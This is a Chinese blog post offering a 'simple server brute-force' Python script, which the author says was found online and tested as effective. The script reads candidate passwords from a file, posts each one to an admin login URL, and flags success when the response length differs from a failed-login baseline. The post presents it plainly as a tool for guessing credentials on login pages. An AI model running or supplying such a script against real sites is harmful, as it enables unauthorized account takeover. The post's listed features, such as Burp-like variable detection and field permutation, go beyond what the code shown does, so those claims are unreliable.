简单的服务器爆破代码

这个代码是网上搜的,已测试很管用!

task:

  • 支持POST爆破
  • 支持类似burp一样的变量识别
  • 支持字段排列组合
  • 支持数据包对比、排序
  • import requests
    url="https://blog.dyboy.cn/admin/"
    n=1
    username=input("请输入用户名")
    data2={'username':username,'password':'00000000','Login':'Login'}
    headers={'cookie':'name=dyboy'}
    response2=requests.post(url,data2,headers=headers)
    text2=response2.text
    f=open("pass.txt","r+")
    for i in f:
        password=i.strip()
        data1={'username':username,'password':password,'Login':'Login'}
        response1=requests.post(url,data1,headers=headers)
        text1=response1.text
        print("第:", n, "次,尝试密码:", password, "HTTP包长度:", len(text1))
        n=n+1
        if (text1!=text2) and len(text1)!=len(text2):
            print("\n成功!")
            print("用户名为:",username)
            print("密码为:",password)
            break
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏
分享
评论 抢沙发